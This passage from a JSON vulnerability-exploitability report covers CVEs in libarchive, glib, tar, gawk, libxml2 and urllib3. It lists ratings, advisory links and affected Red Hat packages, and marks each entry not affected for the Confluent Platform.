      "description": "Libarchive through 3.6.2 can cause directories to have world-writable permissions. The umask() call inside archive_write_disk_posix.c changes the umask of the whole process for a very short period of time; a race condition with another thread can lead to a permanent umask 0 setting. Such a race condition could lead to implicit directory creation with permissions 0777 (without the sticky bit), which means that any low-privileged local user can delete and rename files inside those directories.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2023-30571"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2023-30571"
        },
        {
          "url": "https://access.redhat.com/solutions/7033331"
        },
        {
          "url": "https://github.com/libarchive/libarchive/issues/1876"
        },
        {
          "url": "https://groups.google.com/g/libarchive-announce"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-30571"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2023-30571"
        }
      ],
      "published": "2023-05-29T20:15:09+00:00",
      "updated": "2026-06-17T05:55:03+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "3.5.3-9.el9_7",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:1080078b-bf88-4505-a133-1abe47582404/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2023-32636",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 6.2,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        400,
        502
      ],
      "description": "A flaw was found in glib, where the gvariant deserialization code is vulnerable to a denial of service introduced by additional input validation added to resolve CVE-2023-29499. The offset table validation may be very slow. This bug does not affect any released version of glib but does affect glib distributors who followed the guidance of glib developers to backport the initial fix for CVE-2023-29499.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2023-32636"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2024:2528"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2023-32636"
        },
        {
          "url": "https://bugzilla.redhat.com/2211827"
        },
        {
          "url": "https://bugzilla.redhat.com/2211828"
        },
        {
          "url": "https://bugzilla.redhat.com/2211829"
        },
        {
          "url": "https://bugzilla.redhat.com/2211833"
        },
        {
          "url": "https://discourse.gnome.org/t/multiple-fixes-for-gvariant-normalisation-issues-in-glib/12835"
        },
        {
          "url": "https://errata.almalinux.org/9/ALSA-2024-2528.html"
        },
        {
          "url": "https://gitlab.gnome.org/GNOME/glib/-/issues/2841"
        },
        {
          "url": "https://https://discourse.gnome.org/t/multiple-fixes-for-gvariant-normalisation-issues-in-glib/12835"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2023-32636.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2024-2528.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-32636"
        },
        {
          "url": "https://security.netapp.com/advisory/ntap-20231110-0002/"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-6165-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-6165-2"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2023-32636"
        }
      ],
      "published": "2023-09-14T20:15:09+00:00",
      "updated": "2026-06-17T05:59:16+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "2.68.4-19.el9_8.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:1080078b-bf88-4505-a133-1abe47582404/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2023-39804",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 6.2,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 3.3,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "description": "In GNU tar before 1.35, mishandled extension attributes in a PAX archive can lead to an application crash in xheader.c.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2023-39804"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2023-39804"
        },
        {
          "url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1058079"
        },
        {
          "url": "https://git.savannah.gnu.org/cgit/tar.git/commit/?id=a339f05cd269013fa133d2f148d73f6f7d4247e4"
        },
        {
          "url": "https://git.savannah.gnu.org/cgit/tar.git/tree/src/xheader.c?h=release_1_34#n1723"
        },
        {
          "url": "https://lists.debian.org/debian-lts-announce/2024/03/msg00008.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-39804"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-6543-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2023-39804"
        }
      ],
      "published": "2024-03-27T04:15:08+00:00",
      "updated": "2026-06-17T06:12:52+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/tar@1.34-11.el9?arch=x86_64&distro=redhat-9.8&epoch=2",
          "versions": [
            {
              "version": "2:1.34-11.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/tar@1.34-11.el9?arch=x86_64&distro=redhat-9.8&epoch=2"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/tar@1.34-11.el9?arch=x86_64&distro=redhat-9.8&epoch=2"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/tar@1.34-11.el9?arch=x86_64&distro=redhat-9.8&epoch=2"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/tar@1.34-11.el9?arch=x86_64&distro=redhat-9.8&epoch=2"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/tar@1.34-11.el9?arch=x86_64&distro=redhat-9.8&epoch=2"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/tar@1.34-11.el9?arch=x86_64&distro=redhat-9.8&epoch=2"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/tar@1.34-11.el9?arch=x86_64&distro=redhat-9.8&epoch=2"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/tar@1.34-11.el9?arch=x86_64&distro=redhat-9.8&epoch=2"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/tar@1.34-11.el9?arch=x86_64&distro=redhat-9.8&epoch=2"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/tar@1.34-11.el9?arch=x86_64&distro=redhat-9.8&epoch=2"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/tar@1.34-11.el9?arch=x86_64&distro=redhat-9.8&epoch=2"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/tar@1.34-11.el9?arch=x86_64&distro=redhat-9.8&epoch=2"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/tar@1.34-11.el9?arch=x86_64&distro=redhat-9.8&epoch=2"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2023-4156",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 7.1,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 6.1,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:H"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        125
      ],
      "description": "A heap out-of-bounds read flaw was found in builtin.c in the gawk package. This issue may lead to a crash and could be used to read sensitive information.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2023-4156"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2023-4156"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2215930"
        },
        {
          "url": "https://git.savannah.gnu.org/gitweb/?p=gawk.git;a=commitdiff;h=e709eb829448ce040087a3fc5481db6bfcaae212"
        },
        {
          "url": "https://mail.gnu.org/archive/html/bug-gawk/2022-08/msg00000.html"
        },
        {
          "url": "https://mail.gnu.org/archive/html/bug-gawk/2022-08/msg00023.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-4156"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-6373-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2023-4156"
        }
      ],
      "published": "2023-09-25T18:15:11+00:00",
      "updated": "2026-06-17T06:37:11+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/gawk@5.1.0-6.el9?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "5.1.0-6.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/gawk@5.1.0-6.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/gawk@5.1.0-6.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#pkg:rpm/redhat/gawk@5.1.0-6.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/gawk@5.1.0-6.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/gawk@5.1.0-6.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/gawk@5.1.0-6.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/gawk@5.1.0-6.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/gawk@5.1.0-6.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/gawk@5.1.0-6.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/gawk@5.1.0-6.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/gawk@5.1.0-6.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/gawk@5.1.0-6.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/gawk@5.1.0-6.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/gawk@5.1.0-6.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/gawk@5.1.0-6.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/gawk@5.1.0-6.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:1080078b-bf88-4505-a133-1abe47582404/1#pkg:rpm/redhat/gawk@5.1.0-6.el9?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2023-45322",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 6.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.9,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H"
        }
      ],
      "cwes": [
        416
      ],
      "description": "libxml2 through 2.11.5 has a use-after-free that can only occur after a certain memory allocation fails. This occurs in xmlUnlinkNode in tree.c. NOTE: the vendor's position is \"I don't think these issues are critical enough to warrant a CVE ID ... because an attacker typically can't control when memory allocations fail.\"",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2023-45322"
        },
        {
          "url": "http://www.openwall.com/lists/oss-security/2023/10/06/5"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2023-45322"
        },
        {
          "url": "https://gitlab.gnome.org/GNOME/libxml2/-/issues/344"
        },
        {
          "url": "https://gitlab.gnome.org/GNOME/libxml2/-/issues/583"
        },
        {
          "url": "https://lists.debian.org/debian-lts-announce/2025/02/msg00028.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-45322"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2023-45322"
        }
      ],
      "published": "2023-10-06T22:15:11+00:00",
      "updated": "2026-06-17T06:28:37+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "2.9.13-14.el9_8.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:1080078b-bf88-4505-a133-1abe47582404/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2023-45803",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "amazon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "ghsa"
          },
          "score": 4.2,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:A/AC:H/PR:H/UI:N/S:U/C:H/I:N/A:N"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 4.2,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:A/AC:H/PR:H/UI:N/S:U/C:H/I:N/A:N"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 4.2,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:A/AC:H/PR:H/UI:N/S:U/C:H/I:N/A:N"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        200
      ],
      "description": "urllib3 is a user-friendly HTTP client library for Python. urllib3 previously wouldn't remove the HTTP request body when an HTTP redirect response using status 301, 302, or 303 after the request had its method changed from one that could accept a request body (like `POST`) to `GET` as is required by HTTP RFCs. Although this behavior is not specified in the section for redirects, it can be inferred by piecing together information from different sections and we have observed the behavior in other major HTTP client implementations like curl and web browsers. Because the vulnerability requires a previously trusted service to become compromised in order to have an impact on confidentiality we believe the exploitability of this vulnerability is low. Additionally, many users aren't putting sensitive data in HTTP request bodies, if this is the case then this vulnerability isn't exploitable. Both of the following conditions must be true to be affected by this vulnerability: 1. Using urllib3 and submitting sensitive information in the HTTP request body (such as form data or JSON) and 2. The origin service is compromised and starts redirecting using 301, 302, or 303 to a malicious peer or the redirected-to service becomes compromised. This issue has been addressed in versions 1.26.18 and 2.0.7 and users are advised to update to resolve this issue. Users unable to update should disable redirects for services that aren't expecting to respond with redirects with `redirects=False` and disable automatic redirects with `redirects=False` and handle 301, 302, and 303 redirects manually by stripping the HTTP request body.",
      "advisories": [
        {
